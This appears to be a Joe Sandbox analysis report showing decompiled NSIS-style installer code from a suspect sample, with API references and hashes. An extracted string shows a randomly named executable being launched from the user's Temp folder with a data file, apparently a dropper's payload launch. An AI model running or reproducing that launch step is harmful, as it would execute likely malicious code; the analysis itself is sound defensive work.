                                                          								L90:
                                                          								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                          									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                          									ShowWindow(_v8, _t324);
                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                          								}
                                                          								goto L93;
                                                          							} else {
                                                          								E004011EF(_t301, 0, 0);
                                                          								_t198 = _a12;
                                                          								if(_t198 != 0) {
                                                          									if(_t198 != 0xffffffff) {
                                                          										_t198 = _t198 - 1;
                                                          									}
                                                          									_push(_t198);
                                                          									_push(8);
                                                          									E00404FFF();
                                                          								}
                                                          								if(_a16 == 0) {
                                                          									L75:
                                                          									E004011EF(_t301, 0, 0);
                                                          									_v36 =  *0x423740;
                                                          									_t201 =  *0x42a288;
                                                          									_v64 = 0xf030;
                                                          									_v24 = 0;
                                                          									if( *0x42a28c <= 0) {
                                                          										L86:
                                                          										if( *0x42a31e == 0x400) {
                                                          											InvalidateRect(_v8, 0, 1);
                                                          										}
                                                          										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                          											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                          										}
                                                          										goto L90;
                                                          									}
                                                          									_t292 = _t201 + 8;
                                                          									do {
                                                          										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                          										if(_t207 != 0) {
                                                          											_t303 =  *_t292;
                                                          											_v72 = _t207;
                                                          											_v76 = 8;
                                                          											if((_t303 & 0x00000001) != 0) {
                                                          												_v76 = 9;
                                                          												_v60 =  &(_t292[4]);
                                                          												_t292[0] = _t292[0] & 0x000000fe;
                                                          											}
                                                          											if((_t303 & 0x00000040) == 0) {
                                                          												_t211 = (_t303 & 0x00000001) + 1;
                                                          												if((_t303 & 0x00000010) != 0) {
                                                          													_t211 = _t211 + 3;
                                                          												}
                                                          											} else {
                                                          												_t211 = 3;
                                                          											}
                                                          											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                          											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                          											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                          										}
                                                          										_v24 = _v24 + 1;
                                                          										_t292 =  &(_t292[0x206]);
                                                          									} while (_v24 <  *0x42a28c);
                                                          									goto L86;
                                                          								} else {
                                                          									_t293 = E004012E2( *0x423740);
                                                          									E00401299(_t293);
                                                          									_t222 = 0;
                                                          									_t301 = 0;
                                                          									if(_t293 <= 0) {
                                                          										L74:
                                                          										SendMessageW(_v12, 0x14e, _t301, 0);
                                                          										_a16 = _t293;
                                                          										_a8 = 0x420;
                                                          										goto L75;
                                                          									} else {
                                                          										goto L71;
                                                          									}
                                                          									do {
                                                          										L71:
                                                          										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                          											_t301 = _t301 + 1;
                                                          										}
                                                          										_t222 = _t222 + 1;
                                                          									} while (_t222 < _t293);
                                                          									goto L74;
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                          							goto L93;
                                                          						} else {
                                                          							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                          							if(_t232 == 0xffffffff) {
                                                          								goto L93;
                                                          							}
                                                          							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                          							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                          								_t294 = 0x20;
                                                          							}
                                                          							E00401299(_t294);
                                                          							SendMessageW(_a4, 0x420, 0, _t294);
                                                          							_a12 = _a12 | 0xffffffff;
                                                          							_a16 = 0;
                                                          							_a8 = 0x40f;
                                                          							goto L56;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					_v36 = 0;
                                                          					_v20 = 2;
                                                          					 *0x42a2c0 = _t291;
                                                          					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                          					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                          					 *0x423734 =  *0x423734 | 0xffffffff;
                                                          					_t297 = _t258;
                                                          					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                          					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                          					 *0x42372c = _t260;
                                                          					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                          					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                          					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                          						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                          					}
                                                          					DeleteObject(_t297);
                                                          					_t298 = 0;
                                                          					do {
                                                          						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                          						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                          							if(_t298 != 0x20) {
                                                          								_v20 = 0;
                                                          							}
                                                          							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                          						}
                                                          						_t298 = _t298 + 1;
                                                          					} while (_t298 < 0x21);
                                                          					_t299 = _a16;
                                                          					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                          					_push(0x15);
                                                          					E004045C4(_a4);
                                                          					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                          					_push(0x16);
                                                          					E004045C4(_a4);
                                                          					_t300 = 0;
                                                          					_v16 = 0;
                                                          					if( *0x42a28c <= 0) {
                                                          						L19:
                                                          						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                          						goto L20;
                                                          					} else {
                                                          						_t319 = _v24 + 8;
                                                          						_v32 = _t319;
                                                          						do {
                                                          							_t278 =  &(_t319[0x10]);
                                                          							if( *_t278 != 0) {
                                                          								_v64 = _t278;
                                                          								_t279 =  *_t319;
                                                          								_v88 = _v16;
                                                          								_t311 = 0x20;
                                                          								_v84 = 0xffff0002;
                                                          								_v80 = 0xd;
                                                          								_v68 = _t311;
                                                          								_v44 = _t300;
                                                          								_v72 = _t279 & _t311;
                                                          								if((_t279 & 0x00000002) == 0) {
                                                          									if((_t279 & 0x00000004) == 0) {
                                                          										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                          									} else {
                                                          										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                          									}
                                                          								} else {
                                                          									_v80 = 0x4d;
                                                          									_v48 = 1;
                                                          									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                          									_v36 = 1;
                                                          									 *( *0x423740 + _t300 * 4) = _t284;
                                                          									_v16 =  *( *0x423740 + _t300 * 4);
                                                          								}
                                                          							}
                                                          							_t300 = _t300 + 1;
                                                          							_t319 =  &(_v32[0x818]);
                                                          							_v32 = _t319;
                                                          						} while (_t300 <  *0x42a28c);
                                                          						if(_v36 != 0) {
                                                          							L20:
                                                          							if(_v20 != 0) {
                                                          								E004045F9(_v8);
                                                          								goto L23;
                                                          							} else {
                                                          								ShowWindow(_v12, 5);
                                                          								E004045F9(_v12);
                                                          								L93:
                                                          								return E0040462B(_a8, _a12, _a16);
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}


























































                                                          0x00405038
                                                          0x00405051
                                                          0x00405056
                                                          0x0040505e
                                                          0x00405064
                                                          0x0040507a
                                                          0x0040507d
                                                          0x004052a8
                                                          0x004052af
                                                          0x004052c3
                                                          0x004052b1
                                                          0x004052b3
                                                          0x004052b6
                                                          0x004052b7
                                                          0x004052be
                                                          0x004052be
                                                          0x004052cf
                                                          0x004052dd
                                                          0x004052e0
                                                          0x004052f6
                                                          0x0040536b
                                                          0x0040536e
                                                          0x00405370
                                                          0x0040537a
                                                          0x00405388
                                                          0x00405388
                                                          0x0040538a
                                                          0x00405394
                                                          0x0040539a
                                                          0x0040539d
                                                          0x004053a0
                                                          0x004053bb
                                                          0x004053a2
                                                          0x004053ac
                                                          0x004053ac
                                                          0x004053a0
                                                          0x00405394
                                                          0x00000000
                                                          0x0040536e
                                                          0x004052fb
                                                          0x00405306
                                                          0x0040530b
                                                          0x00405312
                                                          0x00405317
                                                          0x0040531b
                                                          0x00405326
                                                          0x00405326
                                                          0x0040532a
                                                          0x0040532e
                                                          0x00405332
                                                          0x00405345
                                                          0x00405334
                                                          0x00405334
                                                          0x0040533b
                                                          0x00405341
                                                          0x0040533d
                                                          0x0040533d
                                                          0x0040533d
                                                          0x0040533b
                                                          0x00405349
                                                          0x0040534b
                                                          0x0040535e
                                                          0x00405361
                                                          0x00405364
                                                          0x00405364
                                                          0x0040532e
                                                          0x00000000
                                                          0x0040531b
                                                          0x004052fd
                                                          0x00405304
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004053be
                                                          0x004053be
                                                          0x004053c5
                                                          0x00405436
                                                          0x0040543e
                                                          0x00405446
                                                          0x00405446
                                                          0x0040544f
                                                          0x00405451
                                                          0x00405458
                                                          0x0040545b
                                                          0x0040545b
                                                          0x00405461
                                                          0x00405468
                                                          0x0040546b
                                                          0x0040546b
                                                          0x00405471
                                                          0x00405477
                                                          0x0040547d
                                                          0x0040547d
                                                          0x0040548a
                                                          0x004055eb
                                                          0x004055f2
                                                          0x0040560f
                                                          0x00405615
                                                          0x00405627
                                                          0x00405627
                                                          0x00000000
                                                          0x00405490
                                                          0x00405492
                                                          0x00405497
                                                          0x0040549c
                                                          0x004054a1
                                                          0x004054a3
                                                          0x004054a3
                                                          0x004054a4
                                                          0x004054a5
                                                          0x004054a7
                                                          0x004054a7
                                                          0x004054af
                                                          0x004054f0
                                                          0x004054f2
                                                          0x00405502
                                                          0x00405505
                                                          0x0040550a
                                                          0x00405511
                                                          0x00405514
                                                          0x004055b6
                                                          0x004055bf
                                                          0x004055c7
                                                          0x004055c7
                                                          0x004055d5
                                                          0x004055e6
                                                          0x004055e6
                                                          0x00000000
                                                          0x004055d5
                                                          0x0040551a
                                                          0x0040551d
                                                          0x00405523
                                                          0x00405528
                                                          0x0040552a
                                                          0x0040552c
                                                          0x00405532
                                                          0x00405539
                                                          0x0040553e
                                                          0x00405545
                                                          0x00405548
                                                          0x00405548
                                                          0x0040554f
                                                          0x0040555b
                                                          0x0040555f
                                                          0x00405561
                                                          0x00405561
                                                          0x00405551
                                                          0x00405553
                                                          0x00405553
                                                          0x00405581
                                                          0x0040558d
                                                          0x0040559c
                                                          0x0040559c
                                                          0x0040559e
                                                          0x004055a1
                                                          0x004055aa
                                                          0x00000000
                                                          0x004054b1
                                                          0x004054bc
                                                          0x004054bf
                                                          0x004054c4
                                                          0x004054c6
                                                          0x004054ca
                                                          0x004054da
                                                          0x004054e4
                                                          0x004054e6
                                                          0x004054e9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004054cc
                                                          0x004054cc
                                                          0x004054d2
                                                          0x004054d4
                                                          0x004054d4
                                                          0x004054d5
                                                          0x004054d6
                                                          0x00000000
                                                          0x004054cc
                                                          0x004054af
                                                          0x0040548a
                                                          0x004053cd
                                                          0x00000000
                                                          0x004053e3
                                                          0x004053ed
                                                          0x004053f2
                                                          0x00000000
                                                          0x00000000
                                                          0x00405404
                                                          0x00405409
                                                          0x00405415
                                                          0x00405415
                                                          0x00405417
                                                          0x00405426
                                                          0x00405428
                                                          0x0040542c
                                                          0x0040542f
                                                          0x00000000
                                                          0x0040542f
                                                          0x004053cd
                                                          0x00405083
                                                          0x00405088
                                                          0x00405091
                                                          0x00405098
                                                          0x004050aa
                                                          0x004050b5
                                                          0x004050bb
                                                          0x004050c9
                                                          0x004050dd
                                                          0x004050e2
                                                          0x004050ef
                                                          0x004050f4
                                                          0x0040510a
                                                          0x0040511b
                                                          0x00405128
                                                          0x00405128
                                                          0x0040512b
                                                          0x00405131
                                                          0x00405133
                                                          0x00405136
                                                          0x0040513b
                                                          0x00405140
                                                          0x00405142
                                                          0x00405142
                                                          0x00405162
                                                          0x00405162
                                                          0x00405164
                                                          0x00405165
                                                          0x0040516a
                                                          0x00405170
                                                          0x00405174
                                                          0x00405179
                                                          0x00405181
                                                          0x00405185
                                                          0x0040518a
                                                          0x0040518f
                                                          0x00405197
                                                          0x0040519a
                                                          0x0040526a
                                                          0x0040527d
                                                          0x00000000
                                                          0x004051a0
                                                          0x004051a3
                                                          0x004051a6
                                                          0x004051a9
                                                          0x004051a9
                                                          0x004051af
                                                          0x004051b8
                                                          0x004051bb
                                                          0x004051bf
                                                          0x004051c2
                                                          0x004051c5
                                                          0x004051ce
                                                          0x004051d7
                                                          0x004051da
                                                          0x004051dd
                                                          0x004051e0
                                                          0x0040521e
                                                          0x00405249
                                                          0x00405220
                                                          0x0040522f
                                                          0x0040522f
                                                          0x004051e2
                                                          0x004051e5
                                                          0x004051f3
                                                          0x004051fd
                                                          0x00405205
                                                          0x0040520c
                                                          0x00405217
                                                          0x00405217
                                                          0x004051e0
                                                          0x0040524f
                                                          0x00405250
                                                          0x0040525c
                                                          0x0040525c
                                                          0x00405268
                                                          0x00405283
                                                          0x00405286
                                                          0x004052a3
                                                          0x00000000
                                                          0x00405288
                                                          0x0040528d
                                                          0x00405296
                                                          0x00405629
                                                          0x0040563b
                                                          0x0040563b
                                                          0x00405286
                                                          0x00000000
                                                          0x00405268
                                                          0x0040519a

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00405049
                                                          • GetDlgItem.USER32 ref: 00405054
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                          • LoadImageW.USER32 ref: 004050B5
                                                          • SetWindowLongW.USER32 ref: 004050CE
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                          • DeleteObject.GDI32(00000000), ref: 0040512B
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                            • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                          • SetWindowLongW.USER32 ref: 0040527D
                                                          • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                          • GlobalFree.KERNEL32 ref: 0040546B
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                          • ShowWindow.USER32(?,00000000), ref: 00405615
                                                          • GetDlgItem.USER32 ref: 00405620
                                                          • ShowWindow.USER32(00000000), ref: 00405627
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                          • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                          • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                          • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                          				intOrPtr _v8;
                                                          				int _v12;
                                                          				void* _v16;
                                                          				struct HWND__* _t56;
                                                          				signed int _t75;
                                                          				signed short* _t76;
                                                          				signed short* _t78;
                                                          				long _t92;
                                                          				int _t103;
                                                          				signed int _t110;
                                                          				intOrPtr _t113;
                                                          				WCHAR* _t114;
                                                          				signed int* _t116;
                                                          				WCHAR* _t117;
                                                          				struct HWND__* _t118;
                                                          
                                                          				if(_a8 != 0x110) {
                                                          					if(_a8 != 0x111) {
                                                          						L13:
                                                          						if(_a8 != 0x4e) {
                                                          							if(_a8 == 0x40b) {
                                                          								 *0x421714 =  *0x421714 + 1;
                                                          							}
                                                          							L27:
                                                          							_t114 = _a16;
                                                          							L28:
                                                          							return E0040462B(_a8, _a12, _t114);
                                                          						}
                                                          						_t56 = GetDlgItem(_a4, 0x3e8);
                                                          						_t114 = _a16;
                                                          						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                          							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                          							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                          							_v12 = _t103;
                                                          							_v16 = _t113;
                                                          							_v8 = 0x428200;
                                                          							if(_t103 - _t113 < 0x800) {
                                                          								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                          								SetCursor(LoadCursorW(0, 0x7f02));
                                                          								_push(1);
                                                          								E00404A32(_a4, _v8);
                                                          								SetCursor(LoadCursorW(0, 0x7f00));
                                                          								_t114 = _a16;
                                                          							}
                                                          						}
                                                          						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                          							goto L28;
                                                          						} else {
                                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                          								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                          							}
                                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                          								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                          							}
                                                          							return 1;
                                                          						}
                                                          					}
                                                          					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                          						goto L27;
                                                          					} else {
                                                          						_t116 =  *0x422720 + 0x14;
                                                          						if(( *_t116 & 0x00000020) == 0) {
                                                          							goto L27;
                                                          						}
                                                          						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                          						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                          						E00404A0E();
                                                          						goto L13;
                                                          					}
                                                          				}
                                                          				_t117 = _a16;
                                                          				_t75 =  *(_t117 + 0x30);
                                                          				if(_t75 < 0) {
                                                          					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                          				}
                                                          				_t76 =  *0x42a298 + _t75 * 2;
                                                          				_t110 =  *_t76 & 0x0000ffff;
                                                          				_a8 = _t110;
                                                          				_t78 =  &(_t76[1]);
                                                          				_a16 = _t78;
                                                          				_v16 = _t78;
                                                          				_v12 = 0;
                                                          				_v8 = E00404734;
                                                          				if(_t110 != 2) {
                                                          					_v8 = E004046FA;
                                                          				}
                                                          				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                          				_push(0x22);
                                                          				E004045C4(_a4);
                                                          				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                          				_push(0x23);
                                                          				E004045C4(_a4);
                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                          				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                          				_t118 = GetDlgItem(_a4, 0x3e8);
                                                          				E004045F9(_t118);
                                                          				SendMessageW(_t118, 0x45b, 1, 0);
                                                          				_t92 =  *( *0x42a270 + 0x68);
                                                          				if(_t92 < 0) {
                                                          					_t92 = GetSysColor( ~_t92);
                                                          				}
                                                          				SendMessageW(_t118, 0x443, 0, _t92);
                                                          				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                          				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                          				 *0x421714 = 0;
                                                          				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                          				 *0x421714 = 0;
                                                          				return 0;
                                                          			}


















                                                          0x00404795
                                                          0x004048c2
                                                          0x0040491f
                                                          0x00404923
                                                          0x004049f0
                                                          0x004049f2
                                                          0x004049f2
                                                          0x004049f8
                                                          0x004049f8
                                                          0x004049fb
                                                          0x00000000
                                                          0x00404a02
                                                          0x00404931
                                                          0x00404937
                                                          0x00404941
                                                          0x0040494c
                                                          0x0040494f
                                                          0x00404952
                                                          0x0040495d
                                                          0x00404960
                                                          0x00404967
                                                          0x00404974
                                                          0x00404985
                                                          0x0040498b
                                                          0x00404993
                                                          0x004049a1
                                                          0x004049a7
                                                          0x004049a7
                                                          0x00404967
                                                          0x004049b1
                                                          0x00000000
                                                          0x004049bc
                                                          0x004049c0
                                                          0x004049d0
                                                          0x004049d0
                                                          0x004049d6
                                                          0x004049e2
                                                          0x004049e2
                                                          0x00000000
                                                          0x004049e6
                                                          0x004049b1
                                                          0x004048cd
                                                          0x00000000
                                                          0x004048df
                                                          0x004048e4
                                                          0x004048ea
                                                          0x00000000
                                                          0x00000000
                                                          0x00404913
                                                          0x00404915
                                                          0x0040491a
                                                          0x00000000
                                                          0x0040491a
                                                          0x004048cd
                                                          0x0040479b
                                                          0x0040479e
                                                          0x004047a3
                                                          0x004047b4
                                                          0x004047b4
                                                          0x004047bc
                                                          0x004047bf
                                                          0x004047c3
                                                          0x004047c6
                                                          0x004047ca
                                                          0x004047cd
                                                          0x004047d0
                                                          0x004047d3
                                                          0x004047da
                                                          0x004047dc
                                                          0x004047dc
                                                          0x004047e6
                                                          0x004047f3
                                                          0x004047fd
                                                          0x00404802
                                                          0x00404805
                                                          0x0040480a
                                                          0x00404821
                                                          0x00404828
                                                          0x0040483b
                                                          0x0040483e
                                                          0x00404852
                                                          0x00404859
                                                          0x0040485e
                                                          0x00404863
                                                          0x00404863
                                                          0x00404871
                                                          0x0040487f
                                                          0x00404891
                                                          0x00404896
                                                          0x004048a6
                                                          0x004048a8
                                                          0x00000000

                                                          APIs
                                                          • CheckDlgButton.USER32 ref: 00404821
                                                          • GetDlgItem.USER32 ref: 00404835
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                          • GetSysColor.USER32(?), ref: 00404863
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                          • lstrlenW.KERNEL32(?), ref: 00404884
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                          • GetDlgItem.USER32 ref: 004048FF
                                                          • SendMessageW.USER32(00000000), ref: 00404906
                                                          • GetDlgItem.USER32 ref: 00404931
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                          • SetCursor.USER32(00000000), ref: 00404985
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                          • SetCursor.USER32(00000000), ref: 004049A1
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                          Strings
                                                          • "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte, xrefs: 00404960
                                                          • N, xrefs: 0040491F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte$N
                                                          • API String ID: 3103080414-2985187365
                                                          • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                          • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                          • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                          • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004062AE(void* __ecx) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				long _t12;
                                                          				long _t24;
                                                          				char* _t31;
                                                          				int _t37;
                                                          				void* _t38;
                                                          				intOrPtr* _t39;
                                                          				long _t42;
                                                          				WCHAR* _t44;
                                                          				void* _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t52;
                                                          				void* _t53;
                                                          
                                                          				_t38 = __ecx;
                                                          				_t44 =  *(_t52 + 0x14);
                                                          				 *0x426de8 = 0x55004e;
                                                          				 *0x426dec = 0x4c;
                                                          				if(_t44 == 0) {
                                                          					L3:
                                                          					_t2 = _t52 + 0x1c; // 0x4275e8
                                                          					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                          						_t53 = _t52 + 0x10;
                                                          						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                          						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                          						_t48 = _t12;
                                                          						 *(_t53 + 0x18) = _t48;
                                                          						if(_t48 != 0xffffffff) {
                                                          							_t42 = GetFileSize(_t48, 0);
                                                          							_t6 = _t37 + 0xa; // 0xa
                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                          							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                          								L18:
                                                          								return CloseHandle(_t48);
                                                          							} else {
                                                          								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                          									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                          									if(_t49 == 0) {
                                                          										_t48 =  *(_t53 + 0x18);
                                                          										L16:
                                                          										_t24 = _t42;
                                                          										L17:
